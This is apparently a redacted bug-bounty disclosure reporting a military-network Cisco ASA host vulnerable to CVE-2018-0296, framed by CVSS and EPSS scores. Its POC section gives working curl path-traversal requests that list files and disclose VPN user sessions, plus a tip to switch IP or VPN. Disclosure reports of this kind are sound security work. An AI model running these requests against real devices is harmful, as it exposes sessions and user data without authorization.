5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
6.7 Medium
AI Score
Confidence
High
0.974 High
EPSS
Percentile
99.9%
##Description
I discovered previously unidentified instance https://█████████ (████.██████.mil) in █████████ network, vulnerable to the CVE-2018-0296 (https://vulners.com/cve/CVE-2018-0296)
##POC
curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
█████████
We can disclose user sessions by quering /sessions:
curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 “File not found” error.
Example of patched version:
curl -i -k "https://█████████.██████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
##Notes
In case you experience request timeout when reproducing, try to change your IP/VPN.
Path traversal, which can allow the unauthenticated attacker disclose sensitive information such as VPN sessions, files, usernames. Under some conditions it’s possible to cause DOS attacks
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
6.7 Medium
AI Score
Confidence
High
0.974 High
EPSS
Percentile
99.9%